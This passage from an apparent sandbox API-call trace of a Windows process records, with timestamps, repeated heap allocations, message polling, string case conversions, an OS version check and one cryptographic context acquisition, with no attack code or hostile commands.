cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0205.863] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0205.863] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0205.863] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0205.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0205.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.863] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0205.864] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.864] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.864] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.864] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0205.864] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0205.864] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0205.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.865] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0205.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0205.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0205.865] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0205.865] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad28b8) returned 1 [0205.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0205.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0205.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0205.867] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.867] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0205.868] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0205.868] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0205.868] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0205.868] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.868] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0205.868] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.869] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0205.869] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0205.869] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0205.869] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0205.869] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.869] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0205.870] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0205.870] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0205.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0205.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0205.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0205.870] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0205.871] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0205.871] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0205.871] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0205.871] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.871] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.871] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.872] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.872] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.872] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.872] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.872] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0205.872] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.873] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0205.873] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.873] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0205.873] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0205.873] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0205.874] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0205.874] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.874] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0205.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.875] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0205.875] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0205.875] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0205.875] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0205.875] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.875] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0205.876] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0205.876] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.876] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0205.876] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0205.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0205.876] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0205.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0205.877] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0205.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0205.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0205.877] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0205.877] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0205.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0205.878] RtlAllocateHeap 